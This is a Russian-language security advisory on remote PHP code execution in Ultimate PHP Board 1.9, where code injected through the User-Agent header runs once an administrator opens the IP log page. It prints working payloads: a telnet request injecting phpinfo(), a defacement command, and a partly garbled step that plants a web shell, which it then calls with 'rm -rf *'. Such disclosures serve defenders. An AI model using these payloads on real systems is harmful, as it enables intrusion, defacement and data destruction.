Удаленное выполнение произвольного PHP кода через HTTP заголовок User-Agent в Ultimate PHP Board

Дата публикации:
29.05.2003
Дата изменения:
17.10.2006
Всего просмотров:
1673
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Ultimate PHP Board (UPB). Удаленный пользователь может выполнить произвольный PHP код на системе как UPB администратор.

F0KP сообщает, что в этом форуме присутствует серьезная уязвимость, которая позволяетатакующему выполнять произвольный php код. UPB протоколирует некоторую информацию о посетителях [ такую как REMOTE_ADDR и HTTP_USER_AGENT ] в текстовый файл в директории `db', который называется `iplog'.

затем в панели администратора, администратор форума может вызвать admin_iplog.php, который просто подключает `iplog'. Например:

e@some_host$ telnet hostname 80
Connected to hostname at 80
GET /board/index.php HTTP/1.0
User-Agent: <? phpinfo(); ?>
когда администратор вызовет admin_iplog.php, ваш код php будет выполнен. Пример: 1.
<? system( "echo \'hacked\' > ../index.html" ); ?>
дефейсит главную страницу форума.

2. \' > ../../tcsh.php" ); ?> создаст tcsh.php с правами httpd в корневой директории веб-сайта. затем вам просто нужно будет зайти на http://hostname/tcsh.php?cmd=rm -rf *

после внедрения кода через поле User-Agent вам нужно подождать пока администратор посмотрит admin_iplog.php.

Уязвимость обнаружена в Ultimate PHP Board 1.9

Ссылки: UPB: Захват Форума/Веб-сайта

или введите имя

CAPTCHA